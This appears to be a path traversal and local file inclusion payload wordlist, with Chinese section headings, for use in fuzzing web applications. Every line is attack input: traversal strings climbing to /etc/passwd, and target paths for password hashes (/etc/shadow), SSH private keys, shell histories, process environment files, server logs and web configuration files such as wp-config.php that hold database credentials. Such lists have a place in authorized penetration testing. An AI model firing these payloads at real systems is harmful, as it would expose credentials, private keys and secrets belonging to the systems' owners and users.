# 基础路径遍历
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd

# 绝对路径
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/group
/etc/resolv.conf
/etc/crontab
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/mysql/my.cnf
/etc/php.ini
/etc/httpd/conf/httpd.conf

# 进程信息
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/status
/proc/self/cwd
/proc/self/exe
/proc/version
/proc/cmdline
/proc/mounts
/proc/net/tcp
/proc/net/udp
/proc/net/arp
/proc/sched_debug

# 日志文件
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/syslog
/var/log/auth.log
/var/log/messages
/var/log/secure
/var/log/mail.log
/var/log/vsftpd.log
/var/log/mysql/error.log

# 用户文件
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/id_rsa
~/.bash_history
~/.ssh/id_rsa

# Web 配置
/var/www/html/.htaccess
/var/www/html/wp-config.php
/var/www/html/config.php
/var/www/html/configuration.php
/var/www/html/settings.php
/var/www/html/database.php
/var/www/html/db.php
/var/www/html/conn.php
/var/www/html/connect.php
